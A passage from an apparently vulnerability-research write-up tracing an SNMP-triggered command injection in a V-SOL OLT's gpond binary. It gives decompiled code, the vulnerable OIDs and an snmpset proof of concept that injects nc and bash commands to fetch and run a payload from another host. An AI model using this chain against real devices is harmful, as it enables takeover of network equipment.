<span class="w"> </span><span class="n">puVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SetTracertIPType</span><span class="p">(</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">puVar1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">puVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SetTracertAction</span><span class="p">((</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">puVar1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar2</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_5</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">-0x80</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">puVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">SetTracertDestIPorHostName</span><span class="p">((</span><span class="kt">long</span><span class="p">)</span><span class="n">param_3</span><span class="p">,</span><span class="n">param_4</span><span class="p">,</span><span class="n">param_5</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">puVar1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>While analyzing this type of parser, I observed the following behavior. When
the value <code>1</code> is parsed, the function <code>SetTracertDestIPorHostName()</code> is executed.
When the value <code>2</code> is parsed, it triggers <code>SetTracertIPType()</code> and finally,
when the value <code>3</code> is received, the function <code>SetTracertAction()</code> is called.</p>
<p>This last function invokes <code>snmp_tracert_diagnose()</code>, which in turn calls
<code>snmp_diagnose_tracert_pthread()</code>, ultimately leading to a Command Injection
via the function <code>snmp_diagnose_tracert_exec()</code>, which internally uses a call
to <code>system()</code>.</p>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>SetTracertDestIPorHostName()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span><span class="w"> </span><span class="nf">SetTracertDestIPorHostName</span><span class="p">(</span><span class="kt">long</span><span class="w"> </span><span class="n">ipaddr</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="n">ipaddrlen</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="sc">'e'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">ReallocateAndSetStringType</span><span class="p">(</span><span class="mh">0xf37d88</span><span class="p">,</span><span class="o">&</span><span class="n">gv_tracertDestIPorHostName</span><span class="p">,</span><span class="n">ipaddr</span><span class="p">,</span><span class="o">*</span><span class="n">ipaddrlen</span><span class="p">);</span>
<span class="w"> </span><span class="n">gv_tracertDestIPorHostNameLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">ipaddrlen</span><span class="p">;</span>
<span class="w"> </span><span class="o">*</span><span class="n">ipaddrlen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gv_tracertDestIPorHostNameLen</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">gv_tracertDestIPorHostName</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="o">*</span><span class="n">ipaddrlen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gv_tracertDestIPorHostNameLen</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">gv_tracertDestIPorHostName</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>SetTracertIPType()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">SetTracertIPType</span><span class="p">(</span><span class="n">uint</span><span class="w"> </span><span class="o">*</span><span class="n">value</span><span class="p">,</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="n">valuelen</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">status</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">uint</span><span class="w"> </span><span class="n">uVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="n">puVar2</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">uVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">value</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="o">*</span><span class="n">status</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'e'</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">uVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gv_tracertIPType</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">value</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xfffffffd</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">4</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">puVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="w"> </span><span class="o">*</span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\x03'</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">gv_tracertIPType</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">uVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">puVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">gv_tracertIPType</span><span class="p">;</span>
<span class="w"> </span><span class="o">*</span><span class="n">valuelen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">puVar2</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>SetTracertAction()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">SetTracertAction</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">undefined8</span><span class="w"> </span><span class="n">uVar2</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'e'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">goto</span><span class="w"> </span><span class="n">LAB_009d90ec</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">gv_tracertAction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">uVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">snmp_tracert_diagnose</span><span class="p">(</span><span class="n">gv_tracertDestIPorHostName</span><span class="p">,</span><span class="n">gv_tracertIPType</span><span class="p">,</span><span class="n">iVar1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">uVar2</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="nl">LAB_009d90ec</span><span class="p">:</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sc">'\x03'</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">undefined4</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="o">*</span><span class="n">param_2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">&</span><span class="n">gv_tracertAction</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>snmp_tracert_diagnose()</code></p>
<div class="highlight"><pre><span></span><code><span class="n">undefined8</span><span class="w"> </span><span class="nf">snmp_tracert_diagnose</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="n">param_2</span><span class="p">,</span><span class="kt">int</span><span class="w"> </span><span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="n">phVar2</span><span class="p">;</span>
<span class="w"> </span><span class="n">in_addr</span><span class="w"> </span><span class="n">aiStack_10</span><span class="w"> </span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_3</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">param_2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">phVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">phVar2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="p">(</span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_aton</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="n">aiStack_10</span><span class="p">),</span><span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(((</span><span class="n">param_2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">phVar2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">param_1</span><span class="p">),</span><span class="w"> </span><span class="n">phVar2</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="p">(</span><span class="n">hostent</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">))</span><span class="w"> </span><span class="o">&&</span>
<span class="w"> </span><span class="p">(</span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_pton</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span><span class="n">param_1</span><span class="p">,</span><span class="n">aiStack_10</span><span class="p">),</span><span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">1</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0xffffffff</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">strcpy</span><span class="p">(</span><span class="n">snmp_tracert_ipaddr</span><span class="p">,</span><span class="n">param_1</span><span class="p">);</span>
<span class="w"> </span><span class="n">snmp_tracert_flag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="n">snmp_diagnose_tracert_pthread</span><span class="p">();</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>snmp_diagnose_tracert_pthread()</code></p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">snmp_diagnose_tracert_pthread</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="n">pthread_t</span><span class="w"> </span><span class="n">local_8</span><span class="p">;</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">local_8</span><span class="p">,(</span><span class="n">pthread_attr_t</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">,</span><span class="n">snmp_diagnose_tracert_exec</span><span class="p">,(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="mi">-1</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">iVar1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">iVar1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pthread_detach</span><span class="p">(</span><span class="n">local_8</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">iVar1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">gpond</span><br/>
Function: <code>snmp_diagnose_tracert_exec()</code></p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">snmp_diagnose_tracert_exec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">local_80</span><span class="p">,</span><span class="s">"traceroute -m 15 %s >%s"</span><span class="p">,</span><span class="n">snmp_tracert_ipaddr</span><span class="p">,</span><span class="s">"/tmp/snmp_tracetest"</span><span class="p">);</span>
<span class="w"> </span><span class="n">system</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">local_80</span><span class="p">);</span>
<span class="w"> </span><span class="n">snmp_tracert_flag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>However, to craft a valid SNMP request, it was necessary to know the full OIDs
that trigger the vulnerable code. This step was straightforward as I simply
decompiled the Java code from the cloud manager to retrieve them.</p>
<h5 id="oids-retrieval">OIDs retrieval</h5>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/sbi/snmp/oid/VSMIBOltSystem.java</span><br/>
Class: <code>VSMIBOltSystem</code></p>
<div class="highlight"><pre><span></span><code><span class="kn">package</span><span class="w"> </span><span class="nn">com.vsol.sbi.snmp.oid</span><span class="p">;</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">VSMIBOltSystem</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertDiagnose</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertDestIPorHostName</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertIPType</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertAction</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertTestResultEntry</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">tracertTestResultS</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">sysOid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VSMIB</span><span class="p">.</span><span class="na">V_SOLUTION_DEVICE_V1600D_SWITCH_SYSTEM</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">tracertDiagnose</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sysOid</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".33"</span><span class="p">;</span>
<span class="w"> </span><span class="n">tracertTestResultTable</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sysOid</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".34"</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">tracertDestIPorHostName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tracertDiagnose</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1"</span><span class="p">;</span>
<span class="w"> </span><span class="n">tracertIPType</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tracertDiagnose</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".2"</span><span class="p">;</span>
<span class="w"> </span><span class="n">tracertAction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tracertDiagnose</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".3"</span><span class="p">;</span>
<span class="w"> </span><span class="n">tracertTestResultEntry</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tracertTestResultTable</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1"</span><span class="p">;</span>
<span class="w"> </span><span class="n">tracertTestResultS</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tracertTestResultEntry</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1"</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/sbi/snmp/oid/VSMIB.java</span><br/>
Class: <code>VSMIB</code></p>
<div class="highlight"><pre><span></span><code><span class="kn">package</span><span class="w"> </span><span class="nn">com.vsol.sbi.snmp.oid</span><span class="p">;</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">VSMIB</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"37950"</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">company2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"1.3.6.1.4.1.17725"</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kd">final</span><span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">V_SOLUTION_DEVICE_V1600D_SWITCH_SYSTEM</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">V_SOLUTION</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"1.3.6.1.4.1."</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="p">;</span>
<span class="w"> </span><span class="n">V_SOLUTION_DEVICE</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"1.3.6.1.4.1."</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1.1"</span><span class="p">;</span>
<span class="w"> </span><span class="n">V_SOLUTION_DEVICE_V1600D</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"1.3.6.1.4.1."</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1.1.5"</span><span class="p">;</span>
<span class="w"> </span><span class="n">V_SOLUTION_DEVICE_V1600D_SWITCH</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"1.3.6.1.4.1."</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".1.1.5.10"</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="n">V_SOLUTION_DEVICE_V1600D_SWITCH_SYSTEM</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">V_SOLUTION_DEVICE_V1600D_SWITCH</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">".12"</span><span class="p">;</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="nf">VSMIB</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">setCommunity_oid</span><span class="p">(</span><span class="n">String</span><span class="w"> </span><span class="n">community_oid</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">community_oid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="err">`</span><span class="n">community_oid</span><span class="p">.</span><span class="na">isEmpty</span><span class="p">())</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">community_oid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"37950"</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">MID_Enterprise_No</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">community_oid</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Which allowed me to get the following results:</p>
<table>
<thead>
<tr>
<th>Java Variable Name</th>
<th>Full OID</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>tracertDiagnose</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.33</code></td>
</tr>
<tr>
<td><code>tracertTestResultTable</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.34</code></td>
</tr>
<tr>
<td><code>tracertDestIPorHostName</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.33.1</code></td>
</tr>
<tr>
<td><code>tracertIPType</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.33.2</code></td>
</tr>
<tr>
<td><code>tracertAction</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.33.3</code></td>
</tr>
<tr>
<td><code>tracertTestResultEntry</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.34.1</code></td>
</tr>
<tr>
<td><code>tracertTestResultS</code></td>
<td><code>1.3.6.1.4.1.37950.1.1.5.10.12.34.1.1</code></td>
</tr>
<tr>
<td><br/></td>
<td></td>
</tr>
</tbody>
</table>
<p>To speed up the process and identify all the OIDs, I used Java reflection to
resolve all the attributes of the relevant classes (see <a href="#list-of-oids-retrieved-through-reflection">List of OIDs retrieved through reflection</a>).
Once the OIDs were identified, a quick proof of concept was created using the
tool <code>snmpset</code>.</p>
<div class="highlight"><pre><span></span><code>snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.1.0<span class="w"> </span>s<span class="w"> </span><span class="s1">$'8.8.8.8\nnc 192.168.8.199 1338 > /tmp/stage0\n'</span>
snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.2.0<span class="w"> </span>i<span class="w"> </span><span class="m">4</span>
snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.3.0<span class="w"> </span>i<span class="w"> </span><span class="m">1</span>
sleep<span class="w"> </span><span class="m">10</span>
snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.1.0<span class="w"> </span>s<span class="w"> </span><span class="s1">$'8.8.8.8\nbash /tmp/stage0\n'</span>
snmpset<span class="w"> </span>-v2c<span class="w"> </span>-c<span class="w"> </span>private<span class="w"> </span><span class="m">192</span>.168.8.200<span class="w"> </span>.1.3.6.1.4.1.37950.1.1.5.10.12.33.2.0<span class="w"> </span>i<span class="w"> </span><span class="m">4</span>
